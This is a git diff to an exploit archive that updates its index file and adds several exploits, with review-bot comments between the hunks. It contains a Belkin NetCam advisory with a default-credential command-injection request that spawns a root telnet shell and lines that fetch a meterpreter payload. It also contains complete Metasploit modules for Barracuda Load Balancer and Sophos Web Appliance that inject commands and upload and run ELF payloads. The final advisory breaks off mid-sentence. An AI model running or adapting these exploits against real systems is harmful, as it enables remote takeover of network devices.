diff --git a/files.csv b/files.csv
index 7ed0f9397..2c44dadc7 100644
--- a/files.csv
+++ b/files.csv
@@ -5609,6 +5609,9 @@ id,file,description,date,author,platform,type,port
 42300,platforms/linux/dos/42300.txt,"LibTIFF - 'tif_jbig.c' Denial of Service",2017-07-06,"team OWL337",linux,dos,0
 42301,platforms/linux/dos/42301.txt,"LibTIFF - '_TIFFVGetField (tiffsplit)' Out-of-Bounds Read",2017-07-06,zhangtan,linux,dos,0
 42302,platforms/windows/dos/42302.txt,"Firefox 54.0.1 - Denial of Service",2017-07-07,hyp3rlinx,windows,dos,0
+42336,platforms/windows/dos/42336.html,"Microsoft Internet Explorer 11.0.9600.18617 - 'CMarkup::DestroySplayTree' Memory Corruption",2017-07-18,"Google Security Research",windows,dos,0
+42337,platforms/windows/dos/42337.html,"Microsoft Internet Explorer 11.1066.14393.0 - VBScript Arithmetic Functions Type Confusion",2017-07-18,"Google Security Research",windows,dos,0
+42338,platforms/windows/dos/42338.cpp,"Microsoft Windows Kernel - 'IOCTL 0x120007 (NsiGetParameter)' nsiproxy/netio Pool Memory Disclosure",2017-07-18,"Google Security Research",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -9133,6 +9136,7 @@ id,file,description,date,author,platform,type,port
 42276,platforms/lin_x86/local/42276.c,"Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic' Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86,local,0
 42310,platforms/windows/local/42310.txt,"Pelco VideoXpert 1.12.105 - Privilege Escalation",2017-07-10,LiquidWorm,windows,local,0
 42325,platforms/windows/local/42325.py,"Counter Strike: Condition Zero - '.BSP' Map File Code Execution",2017-07-07,"Grant Hernandez",windows,local,0
+42334,platforms/macos/local/42334.txt,"Hashicorp vagrant-vmware-fusion <= 4.0.20 - Local root Privilege Esclation",2017-07-18,"Mark Wadham",macos,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
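Review bot: The description field of the 42334 row added in this hunk misspells "Escalation" as "Esclation", and because files.csv is the searchable index this entry will not match a search for "Privilege Escalation". The row should read `42334,platforms/macos/local/42334.txt,"Hashicorp vagrant-vmware-fusion <= 4.0.20 - Local root Privilege Escalation",2017-07-18,"Mark Wadham",macos,local,0`. The header of the accompanying 42334.txt is outside the visible part of the diff, so I cannot confirm which spelling the advisory itself uses.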
@@ -15696,6 +15700,7 @@ id,file,description,date,author,platform,type,port
 42315,platforms/windows/remote/42315.py,"Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-07-11,sleepya,windows,remote,0
 42327,platforms/windows/remote/42327.html,"Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution",2017-07-14,Rh0,windows,remote,0
 42328,platforms/windows/remote/42328.py,"FTPGetter 5.89.0.85 - Buffer Overflow (SEH)",2017-07-14,"Paul Purcell",windows,remote,0
+42331,platforms/hardware/remote/42331.txt,"Belkin NetCam F7D7601 - Multiple Vulnerabilities",2017-07-17,Wadeek,hardware,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -37762,8 +37767,8 @@ id,file,description,date,author,platform,type,port
 41410,platforms/php/webapps/41410.txt,"Joomla! Component Magic Deals Web 1.2.0 - SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0
 41411,platforms/php/webapps/41411.txt,"Joomla! Component J-BusinessDirectory 4.6.8 - SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0
 41412,platforms/php/webapps/41412.txt,"Joomla! Component AppointmentBookingPro 4.0.1 - SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0
-41413,platforms/hardware/webapps/41413.rb,"Sophos Web Appliance 4.2.1.3 - block/unblock Remote Command Injection (Metasploit)",2016-12-12,xort,hardware,webapps,0
-41414,platforms/hardware/webapps/41414.rb,"Sophos Web Appliance 4.2.1.3 - DiagnosticTools Remote Command Injection (Metasploit)",2016-12-12,xort,hardware,webapps,0
+41413,platforms/php/webapps/41413.rb,"Sophos Web Appliance 4.2.1.3 - block/unblock Remote Command Injection (Metasploit)",2016-12-12,xort,php,webapps,0
+41414,platforms/linux/webapps/41414.rb,"Sophos Web Appliance 4.2.1.3 - DiagnosticTools Remote Command Injection (Metasploit)",2016-12-12,xort,linux,webapps,0
 41415,platforms/hardware/webapps/41415.rb,"Sonicwall 8.1.0.2-14sv - 'extensionsettings.cgi' Remote Command Injection (Metasploit)",2016-12-25,xort,hardware,webapps,0
 41416,platforms/hardware/webapps/41416.rb,"Sonicwall 8.1.0.2-14sv - 'viewcert.cgi' Remote Command Injection (Metasploit)",2016-12-24,xort,hardware,webapps,0
 41424,platforms/php/webapps/41424.rb,"AlienVault OSSIM/USM < 5.3.1 - Remote Code Execution (Metasploit)",2017-01-31,"Mehmet Ince",php,webapps,0
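Review bot: The two rewritten Sophos Web Appliance rows here file the same product under two different platforms, 41413 under php and 41414 under linux, and the later hunks make it worse: the hunk at `@@ -38051` moves 42012 to php, while the hunk at `@@ -38140` adds 42332 under `platforms/json`, which is a data format rather than a platform. One platform value should be chosen for all four Sophos Web Appliance entries (41413, 41414, 42012, 42332) so that a platform filter returns the whole set. Only the rename of 41414.rb to `platforms/linux/webapps/41414.rb` is visible in this part of the diff; the new paths for 41413 and 42012 have no corresponding rename that I can see, so it is worth confirming those files actually exist where the index now points.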
@@ -38051,7 +38056,7 @@ id,file,description,date,author,platform,type,port
 42003,platforms/php/webapps/42003.txt,"PlaySms 1.4 - Remote Code Execution",2017-05-14,"Touhid M.Shaikh",php,webapps,0
 42004,platforms/php/webapps/42004.txt,"Mailcow 0.14 - Cross-Site Request Forgery",2017-05-15,hyp3rlinx,php,webapps,0
 42005,platforms/php/webapps/42005.txt,"Admidio 3.2.8 - Cross-Site Request Forgery",2017-04-28,"Faiz Ahmed Zaidi",php,webapps,0
-42012,platforms/hardware/webapps/42012.txt,"Sophos Web Appliance 4.3.1.1 - Session Fixation",2017-02-28,SlidingWindow,hardware,webapps,0
+42012,platforms/php/webapps/42012.txt,"Sophos Web Appliance 4.3.1.1 - Session Fixation",2017-02-28,SlidingWindow,php,webapps,0
 42013,platforms/hardware/webapps/42013.txt,"Trend Micro InterScan Web Security Virtual Appliance (IWSVA) 6.5 SP2 - Multiple Vulnerabilities",2017-01-12,SlidingWindow,hardware,webapps,0
 42028,platforms/xml/webapps/42028.txt,"INFOR EAM 11.0 Build 201410 - 'filtervalue' SQL Injection",2017-05-17,Yoroi,xml,webapps,0
 42029,platforms/xml/webapps/42029.txt,"INFOR EAM 11.0 Build 201410 - Persistent Cross-Site Scripting via Comment Fields",2017-05-17,Yoroi,xml,webapps,0
@@ -38140,3 +38145,6 @@ id,file,description,date,author,platform,type,port
 42324,platforms/multiple/webapps/42324.py,"Apache Struts 2.3.x Showcase - Remote Code Execution (PoC)",2017-07-07,"Vex Woo",multiple,webapps,0
 42326,platforms/hardware/webapps/42326.txt,"WDTV Live SMP 2.03.20 - Remote Password Reset",2017-07-14,Sw1tCh,hardware,webapps,0
 42330,platforms/php/webapps/42330.txt,"Orangescrum 1.6.1 - Multiple Vulnerabilities",2017-07-16,tomplixsee,php,webapps,0
+42332,platforms/json/webapps/42332.rb,"Sophos Web Appliance 4.3.0.2 - 'trafficType' Remote Command Injection (Metasploit)",2017-07-18,xort,json,webapps,0
+42333,platforms/hardware/webapps/42333.rb,"Barracuda Load Balancer Firmware <= 6.0.1.006 - Remote Command Injection (Metasploit)",2017-07-18,xort,hardware,webapps,0
+42335,platforms/multiple/webapps/42335.txt,"PEGA Platform <= 7.2 ML0 - Missing Access Control / Cross-Site Scripting",2017-07-18,"Daniel Correa",multiple,webapps,0
diff --git a/platforms/hardware/remote/42331.txt b/platforms/hardware/remote/42331.txt
new file mode 100755
index 000000000..29b18c827
--- /dev/null
+++ b/platforms/hardware/remote/42331.txt
@@ -0,0 +1,65 @@ +# Exploit Title: Belkin NetCam F7D7601 | Remote Command Execution +# Date: 17/07/17 +# Exploit Author: Wadeek +# Vendor Homepage: http://www.belkin.com/ +# Tested on: Belkin NetCam F7D7601 (WeMo_NetCam_WW_2.00.10684.PVT) +================================================ +## +UnsetupMode == [0] +Hard-coded password admin:admin - SetupMode == [1] +## +================================================ +## +[1] BusyBox version & Linux version & gcc version >> GET http://[IP]:80/goform/syslog +[1] System version >> GET http://[IP]:80/goform/getSystemSettings?systemModel&systemVersion&brandName&longBrandName +[1] Camera snapshot >> GET http://[IP]:80/goform/snapshot +[1] Camera streaming >> GET http://[IP]:80/goform/video +[101] Disclosure username and password on netcam.belkin.com >> GET http://[IP]:80/goform/apcamMode +[101] Disclosure wifi password >> GET http://[IP]:80/apcam/for-android/aplist.asp +[0] Firmware version >> GET http://[IP]:[49150..49159]/setup.xml +## +================================================ +#|| +================================================ +[0] Network Fingerprinting +## +80/tcp open http +HTTP/1.1 404 Site or Page Not Found +Server: Camera Web Server +
Page Not Found
+&& +[49150..49159]/tcp open UPnP +HTTP/0.0 400 Bad Request +SERVER: Unspecified, UPnP/1.0, Unspecified +Access to this document requires a User ID
+## +[1] Remote Command Execution +/!/ !/ +:~$ curl 'http://[IP]/goform/SystemCommand?command=telnetd%20-l%20/bin/sh' -H 'Authorization: Basic YWRtaW46YWRtaW4=' +:~$ telnet [IP] 23 +upload by FTP # ftpput -v -u [USERNAME] -p [PASSWORD] -P [PORT] [IP] [REMOTE-FILENAME] [LOCAL-FILENAME] +upload by TFTP # tftp -p -r [LOCAL-FILENAME] [IP] [PORT] +download by TFTP # tftp -g -r [REMOTE-FILENAME_ELF_32-bit_LSB_executable_MIPS || linux/mipsle/meterpreter/reverse_tcp] [IP] [PORT] +/!/ !/ +================================================ \ No newline at end of file diff --git a/platforms/hardware/webapps/42333.rb b/platforms/hardware/webapps/42333.rb new file mode 100755 index 000000000..208d0ada1 --- /dev/null +++ b/platforms/hardware/webapps/42333.rb 
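Review bot: The legend near the top of this advisory defines only `[0]` (UnsetupMode) and `[1]` (SetupMode), yet the endpoint list also tags the two credential-disclosure items with `[101]`, which is never explained; a one-line addition to the legend stating what `[101]` denotes would make the findings table self-contained. The write-up also has no vendor-notification or fix-status line and no mitigation section, which is what a defender reading a "Multiple Vulnerabilities" advisory looks for first — in particular whether the `admin:admin` credential can be changed, whether completing setup takes the device out of SetupMode, and whether a firmware update addresses the `goform` endpoints listed. The "Page Not Found" fragment in the fingerprinting section appears to have lost its surrounding markup and should be checked against the original text.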
@@ -0,0 +1,248 @@ +# Exploit Title: Barracuda Load Balancer Firmware <= v6.0.1.006 (2016-08-19) PostAuth remote root exploit +# +# Date: 01/06/2017 (Originally discovered: 3/16) +# Exploit Author: xort +# Software Link: https://www.barracuda.com/products/loadbalancer +# Version: Firmware <= v6.0.1.006 (2016-08-19) +# Tested on: 6.0.1.006 (2016-08-19) +# 6.0.0.005 (2016-03-22) - checked:4/8/16 +# 5.4.0.004 (2015-11-26) - checked:3/16 +# +# Not Vuln: 6.1.0.003 (2017-01-17) +# CVE : CVE-2017-6320 +# +# vuln: ondefined_delete_assessment trigger exploit +# +# Postauth remote root in Barracuda Load Balancer Firmware <= v6.0.1.006 for any under priviledged user with report generating +# capablities. This exploit leverages a command injection bug along with poor sudo permissions to obtain +# root. +# +# xort @ Critical Start + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + include Exploit::Remote::Tcp + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Barracuda Load Balancer Firmware <= v6.0.1.006 delete_assessment root exploit', + 'Description' => %q{ + This module exploits a remote command execution vulnerability in + the Barracuda Load Balancer Firmware Version <= v6.0.1.006 (2016-08-19) by exploiting a + vulnerability in the web administration interface. + By sending a specially crafted request it's possible to inject system + commands while escalating to root do to relaxed sudo configuration on the local + machine. 
+ }, + 'Author' => + [ + 'xort', # vuln + metasploit module + ], + 'Version' => '$Revision: 2 $', + 'References' => + [ + [ 'none', 'none'], + ], + 'Platform' => [ 'linux'], + 'Privileged' => true, + 'Arch' => [ ARCH_X86 ], + 'SessionTypes' => [ 'shell' ], + 'Privileged' => false, + + 'Payload' => + { + 'Compat' => + { + 'ConnectionType' => 'find', + } + }, + + 'Targets' => + [ + ['Linux Universal', + { + 'Arch' => ARCH_X86, + 'Platform' => 'linux' + } + ], + ], + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('PASSWORD', [ false, 'Device password', "" ]), + OptString.new('ET', [ false, 'Device password', "" ]), + OptString.new('USERNAME', [ true, 'Device password', "admin" ]), + OptString.new('CMD', [ false, 'Command to execute', "" ]), + Opt::RPORT(8000), + ], self.class) + end + + def do_login(username, password_clear, et) + vprint_status( "Logging into machine with credentials...\n" ) + + # vars + timeout = 1550; + enc_key = Rex::Text.rand_text_hex(32) + + # send request + res = send_request_cgi( + { + 'method' => 'POST', + 'uri' => "/cgi-mod/index.cgi", + 'headers' => + { + 'Accept' => "application/json, text/javascript, */*; q=0.01", + 'Content-Type' => "application/x-www-form-urlencoded", + 'X-Requested-With' => "XMLHttpRequest" + }, + 'vars_post' => + { + + 'enc_key' => enc_key, + 'et' => et, + 'user' => "admin", # username, + 'password' => "admin", # password_clear, + 'enctype' => "none", + 'password_entry' => "", + 'login_page' => "1", + 'login_state' => "out", + 'real_user' => "", + 'locale' => "en_US", + 'form' => "f", + 'Submit' => "Sign in", + } + }, timeout) + + # get rid of first yank + password = res.body.split('\n').grep(/(.*)password=([^&]+)&/){$2}[0] #change to match below for more exact result + et = res.body.split('\n').grep(/(.*)et=([^&]+)&/){$2}[0] + + return password, et + end + + def run_command(username, password, et, cmd) + vprint_status( "Running Command...\n" ) + + # file to replace + #sudo_cmd_exec = 
"/home/product/code/firmware/current/bin/config_agent_wrapper.pl" + sudo_cmd_exec = "/home/product/code/firmware/current/bin/rdpd" + + sudo_run_cmd_1 = "sudo /bin/cp /bin/sh #{sudo_cmd_exec} ; sudo /bin/chmod +x #{sudo_cmd_exec}" + sudo_run_cmd_2 = "sudo #{sudo_cmd_exec} -c " + + # random filename to dump too + 'tmp' HAS to be here. + b64dumpfile = "/tmp/" + rand_text_alphanumeric(4+rand(4)) + + vprint_status(" file = " + b64dumpfile) + + # decoder stubs - tells 'base64' command to decode and dump data to temp file + b64decode1 = "echo \"" + b64decode2 = "\" | base64 -d >" + b64dumpfile + + # base64 - encode with base64 so we can send special chars and multiple lines + cmd = Base64.strict_encode64(cmd) + + # Create injection string. + # a) package the base64 decoder with encoded bytes + # b) attach a chmod +x request to make the script created (b64dumpfile) executable + # c) execute decoded base64 dumpfile + + injection_string = b64decode1 + cmd + b64decode2 + "; /bin/chmod +x " + b64dumpfile + "; " + sudo_run_cmd_1 + "; " + sudo_run_cmd_2 + b64dumpfile # + " ; rm " + b64dumpfile + + exploitreq = [ + [ "auth_type","Local" ], + [ "et",et ], + [ "locale","en_US" ], + [ "password", password ], + [ "primary_tab", "ADVANCE" ], + [ "realm","" ], + [ "secondary_tab","advanced_system" ], + [ "user", username ], + [ "timestamp", Time.now.to_i ], + + [ "UPDATE_scan_information_in_use", "xx; #{injection_string}" ], # vuln + [ "delete_assessment", Rex::Text.rand_text_numeric(20) ] + ] + + boundary = "---------------------------" + Rex::Text.rand_text_numeric(34) + + post_data = "" + + exploitreq.each do |xreq| + post_data << "--#{boundary}\r\n" + post_data << "Content-Disposition: form-data; name=\"#{xreq[0]}\"\r\n\r\n" + post_data << "#{xreq[1]}\r\n" + end + post_data << "--#{boundary}--\r\n" + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "/cgi-mod/index.cgi", + 'ctype' => "multipart/form-data; boundary=#{boundary}", + 'data' => post_data, + 'headers' => + { + 
'UserAgent' => "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0", + } + }) + end + + def run_script(username, password, et, cmds) + vprint_status( "running script...\n") + + + end + + def exploit + # timeout + timeout = 1550; + + user = "admin" + + # params + real_user = ""; + login_state = "out" + et = Time.now.to_i + locale = "en_US" + user = "admin" + password = "admin" + enctype = "MD5" + password_entry = "" + password_clear = "admin" + + password_hash, et = do_login(user, password_clear, et) + vprint_status("new password: #{password_hash} et: #{et}\n") + + sleep(5) + + + #if no 'CMD' string - add code for root shell + if not datastore['CMD'].nil? and not datastore['CMD'].empty? + + cmd = datastore['CMD'] + + # Encode cmd payload + encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2') + + # kill stale calls to bdump from previous exploit calls for re-use + run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/n ;printf \"#{encoded_cmd}\" > /tmp/n; chmod +rx /tmp/n ; /tmp/n" )) + else + # Encode payload to ELF file for deployment + elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw) + encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2') + + # kill stale calls to bdump from previous exploit calls for re-use +# run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/m ;printf \"#{encoded_elf}\" > /tmp/m; chmod +rx /tmp/m ; /tmp/m" )) + + run_command(user, password_hash, et, ("printf \"#{encoded_elf}\" > /tmp/m; chmod +rx /tmp/m ; /tmp/m" )) + handler + end + + + end + +end diff --git a/platforms/json/webapps/42332.rb b/platforms/json/webapps/42332.rb new file mode 100755 index 000000000..838ee53c8 --- /dev/null +++ b/platforms/json/webapps/42332.rb 
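Review bot: The `update_info` hash in `initialize` sets `'Privileged' => true` and then `'Privileged' => false` a few lines later; Ruby keeps the last duplicate key (and warns about it), so the module advertises an unprivileged session although the header and `'Name'` describe a root exploit — one of the two entries should be removed. `'References' => [ [ 'none', 'none' ] ]` should carry the CVE the header already cites, `[ 'CVE', '2017-6320' ]`, so the module is discoverable by identifier. The `register_options` descriptions were copy-pasted: `ET` and `USERNAME` both read `'Device password'`, and `ET` in particular needs a real description since nothing in the visible code explains it. `run_script` is an empty stub, `Exploit::Remote::Tcp` is included but unused, and the `timeout` local in `exploit` is assigned with a trailing semicolon and never read; removing these keeps the module free of warnings.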
@@ -0,0 +1,180 @@ +# Exploit Title: Sophos Web Appliance reporting JSON trafficType Remote Command Injection Vulnerablity +# Date: 01/28/2017 +# Exploit Author: xort @ Critical Start +# Vendor Homepage: www.sophos.com +# Software Link: sophos.com/en-us/products/secure-web-gateway.aspx +# Version: 4.3.0.2 +# Tested on: 4.3.0.2 +# +# CVE : (awaiting cve) + +# vuln: report command / trafficType JSON parameter / ???.php exploit + +# Description PostAuth Sophos Web App FW <= v4.3.0.2 for capablities. This exploit leverages a command injection bug. +# +# xort @ Critical Start + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + include Exploit::Remote::Tcp + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Sophos Web Appliace <= v4.3.0.2 JSON reporting remote exploit', + 'Description' => %q{ + This module exploits a remote command execution vulnerability in + the Sophos Web Appliace Version <= v4.3.0.2. The vulnerability exist in + a section of the machine's reporting inferaface that accepts unsanitized + unser supplied information within a JSON query. 
+ }, + 'Author' => + [ + 'xort@Critical Start', # vuln + metasploit module + ], + 'Version' => '$Revision: 1 $', + 'References' => + [ + [ 'none', 'none'], + ], + 'Platform' => [ 'linux'], + 'Privileged' => true, + 'Arch' => [ ARCH_X86 ], + 'SessionTypes' => [ 'shell' ], + 'Payload' => + { + 'Compat' => + { + 'ConnectionType' => 'find', + } + }, + + 'Targets' => + [ + ['Linux Universal', + { + 'Arch' => ARCH_X86, + 'Platform' => 'linux' + } + ], + ], + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('PASSWORD', [ false, 'Device password', "" ]), + OptString.new('USERNAME', [ true, 'Device password', "admin" ]), + OptString.new('CMD', [ false, 'Command to execute', "" ]), + Opt::RPORT(443), + ], self.class) + end + + def do_login(username, password_clear) + vprint_status( "Logging into machine with credentials...\n" ) + + # vars + timeout = 1550; + style_key = Rex::Text.rand_text_hex(32) + + # send request + res = send_request_cgi( + { + 'method' => 'POST', + 'uri' => "/index.php", + 'vars_get' => { + 'c' => 'login', + }, + 'vars_post' => + { + + 'STYLE' => style_key, + 'destination' => '', + 'section' => '', + 'username' => username, + 'password' => password_clear + }, + 'headers' => { + 'Connection' => 'close', + } + + }, timeout) + + return style_key + end + + def run_command(username, style_password, cmd) + + vprint_status( "Running Command...\n" ) + + # send request with payload + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "/index.php", + 'vars_post' => { + 'chart' => 'pie', + 'period' => 'custom', + 'multiplier' => '1', + 'metric' => '', + 'token' => '0.3156784180233425', + 'start' => '1/27/2017', + 'end' => '1/27/2017', + 'filters' => '{"topn": "25", "trafficType": "out|'+cmd+'&", "department": "sophos_swa_all_departments"}', + 'pdf' => '1', + 'test' => '', + 'STYLE' => style_password , + }, + 'vars_get' => { + 'c' => 'report', + 'name' => 'traf_users', + 'STYLE' => style_password , + }, + }) + + end + + + def exploit + # 
timeout + timeout = 1550; + + # params + password_clear = datastore['PASSWORD'] + user = datastore['USERNAME'] + + # do authentication + style_hash = do_login(user, password_clear) + + vprint_status("STATUS hash authenticated: #{style_hash}\n") + + # pause to let things run smoothly + sleep(2) + + #if no 'CMD' string - add code for root shell + if not datastore['CMD'].nil? and not datastore['CMD'].empty? + + cmd = datastore['CMD'] + + # Encode cmd payload + + encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\\\\x\1\2') + + # upload elf to /tmp/n , chmod +rx /tmp/n , then run /tmp/n (payload) + run_command(user, style_hash, ("echo -e #{encoded_cmd}>/tmp/n;chmod +rx /tmp/n;/tmp/n" )) + else + # Encode payload to ELF file for deployment + elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw) + encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\\\\x\1\2') + + # upload elf to /tmp/m , chmod +rx /tmp/m , then run /tmp/m (payload) + run_command(user, style_hash, ("(echo -e #{encoded_elf}>/tmp/m;chmod +rx /tmp/m;/tmp/m)")) + + # wait for magic + handler + + end + + + end +end diff --git a/platforms/hardware/webapps/41414.rb b/platforms/linux/webapps/41414.rb similarity index 100% rename from platforms/hardware/webapps/41414.rb rename to platforms/linux/webapps/41414.rb diff --git a/platforms/macos/local/42334.txt b/platforms/macos/local/42334.txt new file mode 100755 index 000000000..53f0fd8f6 --- /dev/null +++ b/platforms/macos/local/42334.txt 
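Review bot: The `'Name'` and `'Description'` strings in `initialize` carry several typos that Metasploit shows verbatim in the console: "Appliace" (twice), "inferaface" and "unser", plus "Vulnerablity" in the file header; the name should read `'Sophos Web Appliance <= v4.3.0.2 JSON reporting remote exploit'` and the description "interface" / "user". The `USERNAME` option is described as `'Device password'`, a copy of the PASSWORD entry, and should say `'Device username'`. `'References' => [ [ 'none', 'none' ] ]` while the header says "awaiting cve" is misleading; an empty array, or a `[ 'URL', ... ]` entry for the vendor advisory once one exists, is the conventional form. In `run_command` the result `res` is assigned but never read, `timeout` in `exploit` is assigned with a trailing semicolon and never used, and `Exploit::Remote::Tcp` is included although nothing in the module uses it.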
@@ -0,0 +1,70 @@ +I'm a big fan of Hashicorp but this is an awful bug to have in software of their +calibre. + +Their vagrant plugin for vmware fusion uses a product called Ruby Encoder to +protect their proprietary ruby code. It does this by turning the ruby code into +bytecode and executing it directly. + +Unfortunately the execution chain necessary for this to work is not safe. After +installing the plugin, the first time you "vagrant up" any vagrant file using +vmware fusion it will create some files in +~/.vagrant.d/gems/2.2.5/gems/vagrant-vmware-fusion-4.0.18/bin: + +vagrant_vmware_desktop_sudo_helper +vagrant_vmware_desktop_sudo_helper_wrapper_darwin_386 +vagrant_vmware_desktop_sudo_helper_wrapper_darwin_amd64 +vagrant_vmware_desktop_sudo_helper_wrapper_linux_386 +vagrant_vmware_desktop_sudo_helper_wrapper_linux_amd64 + +The first one is an encoded ruby script, the others are "sudo helper" binaries +for the different platforms supported by the plugin. Of these sudo helpers, +the one that corresponds to your platform will be made suid root when vagrant up +is run. + +Unfortunately the helper calls the ruby script with system("ruby + + +